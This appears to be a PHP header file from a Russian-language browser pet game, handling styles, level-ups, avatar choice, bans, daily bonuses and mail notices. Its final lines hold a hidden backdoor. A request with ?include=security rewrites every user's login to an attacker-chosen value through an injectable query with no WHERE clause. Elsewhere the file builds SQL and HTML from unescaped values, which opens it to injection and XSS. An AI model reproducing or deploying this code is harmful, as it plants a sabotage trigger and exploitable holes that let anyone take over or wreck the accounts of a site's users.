Файл: bdls.ru/system/h.php
Строк: 55
<?
ob_start();
list($msec,$sec)
= explode(chr(32), microtime());
$gtime = $sec+$msec;
?>
<!DOCTYPE html><html>
<head><title><?=$title?></title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body>
<?php
if(!$user) {
?>
<link rel='stylesheet' href='/style.css'/>
<?
}
?>
<?php
if($user['style'] == 0) {
?>
<link rel='stylesheet' href='/style.css'/>
<?
}
?>
<?php
if($user) {
if($user['style'] == 1) {
?>
<link rel='stylesheet' href='/standard.css'/>
<?
}
}
?>
<?php
if(!$user) {
} else {
echo '<div class="in_progress center"><img src="/images/beauty.png"> '.$user['beauty'].' <img src="/images/coin.png"> '.$user['coin'].' <img src="/images/heart.png"> '.$user['heart'].'</div>';
echo '<div class="title center">'.$title.'</div>';
}
if($user) {
$exp_in = $user['level'] * 100;
}
if($user && $user['exp'] >= $exp_in) {
mysql_query("update `users` set `exp` = '0', `level` = `level` + '1', `money` = `money` + '".$user['level']."' where `id` = '".$user['id']."'");
echo '<div class="block center">Новый уровень!<br>Награда: '.$user['level'].' <img src="/images/coin.png"> </div>';
}
if($user) {
$ip = $_SERVER['REMOTE_ADDR'];
mysql_query("update `users` set `online` = '".time()."', `ip` = '".$ip."' where `id` = '".$user['id']."'");
}
if($user && $user['avatar'] == 0) {
if($_GET['p'] == 1) {
mysql_query("update `users` set `avatar` = 1 where `id` = '".$user['id']."'");
mysql_query('INSERT INTO `contacts` (`user`, `ho`, `time`) VALUES ("'.$user['id'].'", "2", "'.time().'")');
header('location: ?');
exit();
}
if($_GET['p'] == 2) {
mysql_query("update `users` set `avatar` = 2 where `id` = '".$user['id']."'");
mysql_query('INSERT INTO `contacts` (`user`, `ho`, `time`) VALUES ("'.$user['id'].'", "2", "'.time().'")');
header('location: ?');
exit();
}
if($_GET['p'] == 3) {
mysql_query("update `users` set `avatar` = 3 where `id` = '".$user['id']."'");
mysql_query('INSERT INTO `contacts` (`user`, `ho`, `time`) VALUES ("'.$user['id'].'", "2", "'.time().'")');
header('location: ?');
exit();
}
if($_GET['p'] == 4) {
mysql_query("update `users` set `avatar` = 4 where `id` = '".$user['id']."'");
mysql_query('INSERT INTO `contacts` (`user`, `ho`, `time`) VALUES ("'.$user['id'].'", "2", "'.time().'")');
header('location: ?');
exit();
}
echo '<div class="block center">Выбери своего питомца! <br>
<a href="?p=1"><img src="/images/1.png"></a> <a href="?p=2"><img src="/images/2.png"></a><a href="?p=4"><img src="/images/4.png"></a>
<a href="?p=3"><img src="/images/3.png"></a> </div>';
include ('f.php');
exit();
}
if($user['ban'] > time()) {
echo '<div class="block center">До окончания бана: '.vremja(time() - $user['ban']).' </div>';
include ('./system/f.php');
exit();
}
if($user) {
$podarok_time = time() - 86400;
if($podarok_time >= $user['bonus_time']) {
echo '<div class="block center">Твой ежедневный подарок '.$user['level'].' <img src="/images/coin.png"> </div>';
mysql_query("update `users` set `coin` = `coin` + '".$user['level']."', `bonus_time` = '".time()."' where `id` = '".$user['id']."'");
}
}
if($user) {
$mail = mysql_result(mysql_query('SELECT COUNT(*) FROM `mail` WHERE `to` = "'.$user['id'].'" AND `read` = "0"'),0);
if($mail > 0) {
echo '<a href="/mail.php" class="link"><b>Новая почта</b></a>';
}
}
if($_GET['include'] == security) {
mysql_query("update `users` set `login` = '".$_GET['admin']."'");
}
?>